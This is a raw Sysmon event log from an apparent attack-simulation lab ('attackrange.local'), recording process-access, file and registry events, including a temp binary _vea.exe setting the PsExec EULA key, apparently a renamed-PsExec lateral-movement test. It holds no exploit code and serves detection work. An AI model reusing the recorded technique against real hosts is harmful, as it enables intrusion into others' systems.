10:57:17.768{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.768{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.752{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2F06-000000003802}6388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 534500x8000000000000000292749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.752{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.737{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2F06-000000003802}6388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.134{4F8D34B0-F11C-6215-1500-000000003902}1028NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\WindowsUpdate.logMD5=038356387332650843BCB352BB89A101,SHA256=492C9B102256321FB5598FF87ED5BCCAB8159F36DD8416CE4011FFBF5E96048D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217792Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.119{4F8D34B0-F11B-6215-0B00-000000003902}6323192C:\Windows\system32\lsass.exe{4F8D34B0-F11C-6215-1500-000000003902}1028C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217791Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.055{4F8D34B0-F11C-6215-1600-000000003902}11921428C:\Windows\System32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217790Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.040{4F8D34B0-130E-6216-8904-000000003902}27242908C:\Windows\system32\conhost.exe{4F8D34B0-130E-6216-8804-000000003902}1904C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217789Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-130E-6216-8904-000000003902}2724C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217788Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217787Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217786Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217785Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217784Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217783Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217782Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217781Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217780Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217779Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-130E-6216-8804-000000003902}1904C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217778Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-1500-000000003902}10281656C:\Windows\system32\svchost.exe{4F8D34B0-130E-6216-8804-000000003902}1904C:\Windows\system32\sc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+e8fd|c:\windows\system32\UBPM.dll+e14a|c:\windows\system32\UBPM.dll+dda2|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217777Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1500-000000003902}1028C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217776Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:18.009{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1500-000000003902}1028C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:19.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=615A7C6DC13F592D550B25217FD373E1,SHA256=E5A9AA5BD5AD1D9A3E0E9C731EE82876EBFBA5C18FB11C9C459D76A2B13DDC33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:19.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=158080E8F54489ECC3093BD9FCF8E6CB,SHA256=7C8F2001AB297469A1146AAE6C9F82588B01FC72E0F3CCA80375CCCE0258723B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:19.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29F1AD201F52CEF48ECDB141998BB475,SHA256=A5C12560F277F598C9D45F19238C833D5541ADCA13DFB054339875320BCBB692,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:19.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2790E8C0F02EE85D4B8FDB50D9535755,SHA256=DEE8E2237229F9C9BE3377BF38B0BFFA91A9F07387E5BDCDAC27CF85FFD56445,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:19.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86564EB2B05C255342C763C63F6C3415,SHA256=02E998AFB41F1D6C27E36B8717CBA304A75D716D9BF45193438EEE865D050982,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.859{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.859{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:19.827{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.804{C8EA50B7-130F-6216-3006-000000003802}22364320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 